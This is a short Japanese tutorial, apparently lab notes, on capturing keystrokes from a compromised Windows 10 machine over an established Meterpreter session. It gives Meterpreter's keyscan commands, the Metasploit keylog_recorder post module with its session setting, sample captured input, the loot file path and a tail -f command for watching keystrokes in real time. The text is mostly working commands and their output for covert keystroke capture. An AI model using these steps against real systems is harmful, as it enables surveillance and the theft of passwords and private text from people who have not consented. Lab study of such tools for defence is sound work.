キーロガーと情報の奪取
meterpreterセッションが確立しているなら
ユーザ権限でも可能
1 | keyscan_start |
でキーロガーの開始
次に Windows10 でメモ帳を開き適当に入力
この状態で
1 | keyscan_dump |
を実行すると
1 2 3 | this is keyloger test<CR><Shift>A<CR><半角/全角>kyou <CR> |
というように入力した文字が表示される
なお CR は改行
shift なども記録される
日本語に関してはそのまま表示されずに
ローマ字で入力したキーが表示される
1 | keyscan_stop |
でキーロガーの停止
リアルタイムで監視するのなら
Metasploit のキーロガーを使う
一度セッションをバックグラウンドに変更
1 | background |
1 2 | use post/windows/capture/keylog_recorderset session 2 |
で使用するキーロガーとセッションの設定
1 | run |
で実行
これで
1 | Keystrokes being saved in to /root/.msf4/loot/20200206043556_default_192.168.1.166_host.windows.key_155453.txt |
と表示され
/root/.msf4/loot/20200206043556_default_192.168.1.166_host.windows.key
に保存される
リアルタイムでキーログを監視するには
ctrl + alt + t で別端末を開き
1 | tail -f /root/.msf4/loot/20200206043556_default_192.168.1.166_host.windows.key_155453.txt |
というように tail コマンドを使う
tailコマンドのオプションについては
tailコマンドのオプション「f」と「F」
を参考に
-f オプションなら今開いているファイルを読み込む
これで WIndows10 で入力した内容が表示されるようになる
キーロガーの終了は ctrl + c で終了